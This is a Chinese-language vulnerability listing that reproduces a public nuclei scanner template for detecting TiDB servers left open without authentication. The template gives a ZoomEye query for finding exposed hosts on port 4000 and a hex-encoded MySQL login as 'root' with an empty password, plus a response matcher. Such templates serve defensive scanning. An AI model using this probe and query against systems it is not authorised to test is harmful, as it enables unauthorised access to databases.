tidb-unauth: TiDB - Unauthenticated Access

日期: 2025-09-01 | 影响软件: TiDB | POC: 已公开

漏洞描述

TiDB server was able to be accessed because no authentication was required. zoomeye-query: tidb +port:"4000"

PoC代码[已公开]

id: tidb-unauth

info:
  name: TiDB - Unauthenticated Access
  author: lu4nx
  severity: high
  description: TiDB server was able to be accessed because no authentication was required.
  metadata:
    max-request: 1
    zoomeye-query: '"tidb" && port=4000'
  tags: network,tidb,unauth,misconfig,tcp,vuln

tcp:
  - inputs:
      - read: 1024              # skip handshake packet
      - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c  # authentication
        type: hex

    host:
      - "{{Hostname}}"
    port: 4000

    read-size: 1024

    matchers:
      - type: binary
        binary:
          # resp format:
          # 07: length, 02: sequence number, 00: success
          - "0700000200000002000000"
# digest: 4b0a00483046022100b6b6f633a433c84c263d16b00851388e2ca2c1c01be1e6206b4217d9c950433602210083bd10d0a947a9f8683f5cf94aec950a2c68cf9c03d4d4a6e1f645427923c41d:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/network/misconfig/tidb-unauth.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐